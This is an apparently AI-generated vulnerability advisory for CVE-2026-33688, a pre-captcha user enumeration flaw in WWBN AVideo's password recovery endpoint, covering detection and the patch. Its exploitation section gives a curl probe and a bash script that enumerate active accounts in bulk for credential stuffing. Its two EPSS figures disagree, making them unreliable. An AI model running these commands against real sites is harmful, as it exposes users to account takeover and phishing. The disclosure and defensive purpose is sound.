CVE-2026-33688: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33688 is a pre-captcha user enumeration and account status disclosure vulnerability in WWBN AVideo, an open source video platform. The flaw exists in the password recovery endpoint (objects/userRecoverPass.php), which performs user existence and account status checks before validating the captcha, enabling unauthenticated attackers to enumerate valid usernames and determine account status at scale. All versions up to and including 26.0 are affected. The vulnerability was published on March 23, 2026, and carries a CVSS v3.1 base score of 5.3 (Medium) (Github Advisory, GHSA Advisory).

Technical details

The root cause is an Observable Response Discrepancy (CWE-204) in objects/userRecoverPass.php. The vulnerable code instantiates a User object from the unsanitized $_REQUEST['user'] parameter at line 11, then returns three distinct JSON error responses — "User not found", "The user is not active", or "Captcha is empty" — before any captcha validation occurs (lines 27–41). This ordering creates a reliable oracle: a "Captcha is empty" response confirms the user exists and is active, while the earlier errors reveal non-existence or inactive/banned status. No rate limiting (rateLimitByIP) or brute-force protection (bruteForceBlock) is applied to the endpoint, and the session-based DDoS protection is trivially bypassed by omitting cookies. A public PoC including curl commands and a bulk enumeration bash script is included in the security advisory (GHSA Advisory).

Impact

Successful exploitation allows unauthenticated remote attackers to enumerate valid usernames and determine whether accounts are active, inactive, or banned — without solving any captcha. The confirmed username list can then be leveraged for targeted credential stuffing or brute-force attacks against the login endpoint, phishing campaigns against real users, or social engineering. There is no direct integrity or availability impact, but the confidentiality exposure facilitates further attacks that could lead to account compromise (GHSA Advisory).

Exploitability

A public proof-of-concept exploit is available in the GitHub security advisory, consisting of curl commands and a bash script that automate bulk user enumeration without requiring captcha solving (GHSA Advisory). There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. The EPSS score is approximately 0.086% (0.000290 per Feedly), placing it in the 25th percentile for exploitation probability within 30 days (Github Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing WWBN AVideo instances running version 26.0 or earlier using search engines (e.g., Shodan, Censys) or by checking the AVideo version disclosure in page source or API responses.
  2. Probe the vulnerable endpoint: Send an HTTP POST request to /AVideo/objects/userRecoverPass.php with a candidate username and an empty captcha field:
    curl -s -X POST 'http://target/AVideo/objects/userRecoverPass.php' -d 'user=admin&captcha=' | jq .error
  3. Interpret the response oracle:
    • "User not found" → username does not exist
    • "The user is not active" → username exists but account is inactive or banned
    • "Captcha is empty" → username exists and account is active
  4. Automate bulk enumeration: Use a wordlist of common usernames and the following bash script to enumerate accounts at scale without solving any captcha:
    for user in admin root test user1 user2 moderator editor; do
      result=$(curl -s -X POST 'http://target/AVideo/objects/userRecoverPass.php' -d "user=${user}&captcha=")
      error=$(echo "$result" | jq -r .error)
      if [ "$error" = "Captcha is empty" ]; then echo "[ACTIVE] $user"
      elif [ "$error" = "The user is not active" ]; then echo "[INACTIVE] $user"
      else echo "[NOT FOUND] $user"; fi
    done
  5. Leverage results: Use the confirmed active usernames for credential stuffing against the login endpoint, targeted phishing, or further attack planning (GHSA Advisory).

Indicators of compromise

  • Network: High volume of HTTP POST requests to /AVideo/objects/userRecoverPass.php from a single IP or rotating IPs; requests with empty or missing captcha parameter values; absence of session cookies in repeated requests to this endpoint.
  • Logs: Web server access logs showing rapid sequential POST requests to userRecoverPass.php with varying user parameter values; AVideo application logs (_error_log) showing repeated RecoverPass start entries from the same IP with different usernames.
  • Behavioral: Requests arriving without cookies (bypassing session-based DDoS protection); enumeration patterns where the same IP cycles through common username wordlists in short time windows (GHSA Advisory).

Mitigation and workarounds

The fix is available in commit e42f54123b460fd1b2ee01f2ce3d4a386e88d157, which reorders the logic in objects/userRecoverPass.php to validate the captcha before performing any user existence checks, and returns a generic success message regardless of account status to prevent enumeration (Patch Commit). Administrators should update AVideo to a version newer than 26.0 that includes this patch. As additional defense-in-depth, the advisory recommends adding rateLimitByIP() to the password recovery endpoint and ensuring all sensitive endpoints return generic responses that do not reveal internal account state (GHSA Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management